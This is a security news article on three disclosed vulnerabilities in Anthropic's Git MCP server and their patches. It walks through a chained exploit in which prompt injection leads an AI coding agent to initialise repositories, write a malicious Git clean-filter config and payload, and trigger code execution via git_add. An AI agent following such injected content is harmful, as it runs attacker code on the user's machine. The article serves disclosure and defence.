Flaws in Anthropic Git Server Allow Code Execution

The integration of large language models with development tools has unlocked unprecedented productivity, yet this new frontier of AI-assisted coding introduces complex security challenges that can be exploited in non-traditional ways. A recently disclosed set of three critical security vulnerabilities in Anthropic’s official Git Model Context Protocol (MCP) server, mcp-server-git, highlights how an attacker could leverage prompt injection to gain unauthorized file access, delete data, and ultimately achieve remote code execution. This situation underscores the subtle but potent threats that emerge when AI agents are granted programmatic access to sensitive environments like Git repositories, transforming seemingly benign interactions into potential attack vectors. The vulnerabilities demonstrate that even reference implementations from major AI labs require rigorous security scrutiny, as flaws in these foundational tools can have far-reaching implications for the entire ecosystem of developers and organizations that build upon them.

1. A Trio of Critical Vulnerabilities

One of the most severe issues, identified as CVE-2025-68143, was a path traversal vulnerability with a high CVSS score of 8.8. This flaw stemmed from the git_init tool, which is designed to initialize a new Git repository. Critically, the tool failed to validate the file system paths provided to it, meaning it would accept any arbitrary path without question. An attacker could exploit this by crafting a malicious prompt that instructs the AI assistant to initialize a repository in a sensitive system directory, such as /etc/ or a user’s home directory. By turning any directory on the system into a Git repository, the attacker could then use subsequent Git commands to manipulate files within that location, potentially overwriting configuration files, user profiles, or other critical data. This vulnerability effectively dismantled file system permissions and boundaries that the server was expected to enforce, providing a powerful primitive for escalating privileges and preparing the groundwork for more sophisticated chained attacks that could lead to full system compromise. The fix, released in version 2025.9.25, addressed this by implementing stringent validation on repository creation paths.

Further compounding the security risks were two additional vulnerabilities, CVE-2025-68144 and CVE-2025-68145, which were addressed in a later patch. The first, CVE-2025-68144, was a critical argument injection flaw with a CVSS score of 8.1. It stemmed from the git_diff and git_checkout functions passing user-controlled arguments directly to the Git command-line interface without proper sanitization. This allowed an attacker to inject malicious flags or commands, effectively tricking the server into executing unintended operations. For instance, a specially crafted argument could be used to overwrite an arbitrary file with an empty diff, effectively deleting its content. The second issue, CVE-2025-68145, was another path traversal vulnerability, this time related to the --repository flag. This flag was intended to restrict operations to a specific, safe repository path. However, due to a lack of validation, an attacker could manipulate the path to break out of the intended directory and access any other Git repository on the server. This completely undermined the tool’s sandboxing capabilities, exposing all version-controlled data on the machine to potential unauthorized access or modification through the AI agent.

2. Exploitation and Mitigation Strategies

The true danger of these individual flaws became apparent when researchers demonstrated how they could be chained together in a sophisticated attack scenario to achieve remote code execution. The attack begins by leveraging CVE-2025-68143 to initialize a Git repository in a directory where the server has write permissions. Next, the attacker uses the Filesystem MCP server, a separate but often co-located tool, to write a malicious .git/config file into this newly created repository. This configuration file is crafted to include a “clean filter,” a Git feature that processes files when they are staged. The attacker then writes two more files: a .gitattributes file to specify that the clean filter should be applied to certain file types and a shell script containing the malicious payload. The final step is to write a file that matches the filter criteria and then issue a git_add command via a prompt injection. When Git attempts to stage this file, it triggers the malicious clean filter, which in turn executes the payload script with the permissions of the MCP server process. This multi-step process effectively turns a series of seemingly benign Git operations into a reliable method for executing arbitrary code on the victim’s system.

In response to the responsible disclosure of these vulnerabilities in June 2025, Anthropic took decisive action to secure the mcp-server-git package. The most significant change was the complete removal of the git_init tool, which eliminated the root cause of the initial path traversal vulnerability (CVE-2025-68143). This change was implemented in version 2025.9.25. For the remaining two vulnerabilities, the development team introduced extra validation logic and sanitization routines to prevent both argument injection and path traversal primitives. These comprehensive fixes, which address CVE-2025-68144 and CVE-2025-68145, were included in version 2025.12.18. All users of the Python package are strongly urged to update to the latest version to ensure they are protected from these attack vectors. The incident serves as a critical reminder for developers integrating LLMs into their workflows to maintain vigilance over their software supply chain and promptly apply security patches, especially for tools that provide programmatic access to core system functionalities like the file system and version control.

3. Broader Implications for the AI Ecosystem

The discovery of these flaws in what was considered a canonical, reference implementation of a Git MCP server sent a clear signal about the nascent security landscape of the AI agent ecosystem. It highlighted that if security boundaries could break down in a foundational tool that developers were expected to emulate, the entire framework for how AI models interact with external tools would require deeper scrutiny. These were not exploits targeting obscure configurations or edge cases; they were vulnerabilities that worked out of the box and were weaponizable through prompt injection alone. This method of attack, where an AI assistant is tricked by malicious data it ingests from sources like a README file or a webpage, represents a paradigm shift in threat modeling. The incident shifted the focus from direct system access to influencing the AI’s “context,” demonstrating that securing the AI agent itself and its tool-using capabilities is paramount. The case served as a critical lesson that the principles of input validation and sandboxing must be rigorously applied not just to user input but to all data an AI model might process.

Subscribe to our weekly news digest.

Join now and become a part of our fast-growing community.

Invalid Email Address
Thanks for Subscribing!
We'll be sending you our best soon!
Something went wrong, please try again later